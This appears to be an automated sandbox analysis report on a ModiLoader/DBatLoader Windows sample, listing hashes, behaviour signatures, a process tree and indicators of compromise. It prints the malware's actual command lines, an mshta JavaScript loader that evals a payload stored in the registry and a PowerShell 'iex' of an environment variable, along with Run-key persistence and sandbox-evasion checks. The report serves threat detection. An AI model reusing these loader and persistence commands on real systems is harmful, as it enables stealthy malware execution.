Analysis

max time kernel: 150s
max time network: 150s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64 arch:x86 image:win7-20240215-en locale:en-us os:windows7-x64 system
submitted: 08-05-2024 10:11
Static task: static1

Behavioral task: behavioral1
  Sample: 245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
  Resource: win7-20240215-en

Behavioral task: behavioral2
  Sample: 245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
  Resource: win10v2004-20240419-en
General

Target: 245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
Size: 395KB
MD5: 245c4c4e6e1cc032d3c504264867202c
SHA1: f293f9d6a9102ab1e75418a44adb76f7fabb5758
SHA256: 84d4030515b6cef25d201b53a1f8df11635ca087b2f0ebd92a7cebbc9d5b4fe4
SHA512: 160130da3e49dc1bf95a3d509db5730602989043b907adfa5d4a2aec9e4bd48fd440e08ddb17874da52c663bdc12902a78a7fb437610f568179398572fe74a9f
SSDEEP: 6144:fweZD43kpFW+51Bhxc0ASZls2QTmUcukV2VDtYIHH89GyDfu07/nlgz:f54+5HxFl4Eug2ltrQDvxU
Malware Config

Signatures
ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Checks for common network interception software (1 TTPs)
  Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
  Processes: regsvr32.exe
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | regsvr32.exe
Looks for VirtualBox drivers on disk (2 TTPs, 1 IoC)
  Processes: regsvr32.exe
    description | ioc | process
    File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys | regsvr32.exe
ModiLoader Second Stage (57 IoCs)
  Resources: memory dumps matched by yara_rule modiloader_stage2
Looks for VMWare Tools registry key (2 TTPs, 1 IoC)
  Processes: regsvr32.exe
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | regsvr32.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes: regsvr32.exe
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | regsvr32.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | regsvr32.exe
Deletes itself (1 IoC)
  Processes: regsvr32.exe
    pid | process
    2468 | regsvr32.exe
Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: regsvr32.exe
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d38b1\\f5332.bat\"" | regsvr32.exe
Maps connected drives based on registry (3 TTPs, 2 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  Processes: regsvr32.exe
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | regsvr32.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | regsvr32.exe
Drops file in System32 directory (1 IoC)
  Processes: powershell.exe
    description | ioc | process
    File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext (2 IoCs)
  Processes: powershell.exe, regsvr32.exe
    description | pid | process | target process
    PID 2208 set thread context of 2468 | 2208 | powershell.exe | regsvr32.exe
    PID 2468 set thread context of 288 | 2468 | regsvr32.exe | regsvr32.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
  Processes: regsvr32.exe
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl | regsvr32.exe
Modifies registry class (7 IoCs)
  Processes: regsvr32.exe
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open\command | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:at6qAM9=\"LHurN\";H8d4=new ActiveXObject(\"WScript.Shell\");j86PLxmJG=\"Exs\";O0ibz0=H8d4.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");uTkp6U=\"74u2k5\";eval(O0ibz0);l4zW6f=\"7qR\";\"" | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.108f08 | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.108f08\ = "085b6" | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6 | regsvr32.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: powershell.exe, regsvr32.exe
    pid | process
    2208 | powershell.exe (4 entries)
    2468 | regsvr32.exe (60 entries)
Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes: powershell.exe, regsvr32.exe
    pid | process
    2208 | powershell.exe
    2468 | regsvr32.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
    description | pid | process
    Token: SeDebugPrivilege | 2208 | powershell.exe
Suspicious use of WriteProcessMemory (20 IoCs)
  Processes: mshta.exe, powershell.exe, regsvr32.exe
    description | pid | process | target process
    PID 2216 wrote to memory of 2208 | 2216 | mshta.exe | powershell.exe (4 entries)
    PID 2208 wrote to memory of 2468 | 2208 | powershell.exe | regsvr32.exe (8 entries)
    PID 2468 wrote to memory of 288 | 2468 | regsvr32.exe | regsvr32.exe (8 entries)
Processes

[1] C:\Users\Admin\AppData\Local\Temp\245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe"
    PID: 1680

[1] C:\Windows\system32\mshta.exe
    Command line: "C:\Windows\system32\mshta.exe" javascript:o8ZTHbxQ="FBuZ";u1x0=new%20ActiveXObject("WScript.Shell");S9nFn2AhO="t";Cf91rv=u1x0.RegRead("HKCU\\software\\TNNUodRp\\1OQGzOh");gOYuU0d8="54PZj";eval(Cf91rv);Zu3Ujv4hu="q";
    PID: 2216
    Signatures:
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:nkojm
        PID: 2208
        Signatures:
          - Drops file in System32 directory
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\regsvr32.exe
            Command line: regsvr32.exe
            PID: 2468
            Signatures:
              - Looks for VirtualBox Guest Additions in registry
              - Looks for VirtualBox drivers on disk
              - Looks for VMWare Tools registry key
              - Checks BIOS information in registry
              - Deletes itself
              - Adds Run key to start application
              - Maps connected drives based on registry
              - Suspicious use of SetThreadContext
              - Modifies Internet Explorer settings
              - Modifies registry class
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: MapViewOfSection
              - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\regsvr32.exe
                Command line: "C:\Windows\SysWOW64\regsvr32.exe"
                PID: 288
Network

MITRE ATT&CK Enterprise v15
  Privilege Escalation
    Boot or Logon Autostart Execution (1)
      Registry Run Keys / Startup Folder (1)
Downloads

Filesize: 47KB
  MD5: 8e8785fc99e521b344980239cea7f715
  SHA1: 544fd1ceb0e8afc36f554309d4c955be2761474d
  SHA256: 3c8bab5bab1a851987c7cef6e1c6e8825038eb9cbea2bb34999ed90688ca3fcb
  SHA512: 0b344f2b4fa10e8f6683ccf276d566114cc54cda510d9dee9b78909d62fbdb01b07be7fdd7cb1a0593db4ae67ed7984c353030a4b805cd500fb26f49f4f18dfc

Filesize: 66B
  MD5: c24de97a6ef661a334132f0ca498cbe9
  SHA1: 0defdce90991f705ca974d991ad9617482a72129
  SHA256: 44c74f10aa1e1531544f8d21e6e408af591a42efbb8f31afe922894423a9bee9
  SHA512: aa3afa1dbe1e7553a766dd8e1cfa95d71905e28b59ee99693bba803f1d6346fb019c9dca410ed361ff228cf9b96848bc5a93b70e486260a0b3dc2ef140fa6b0c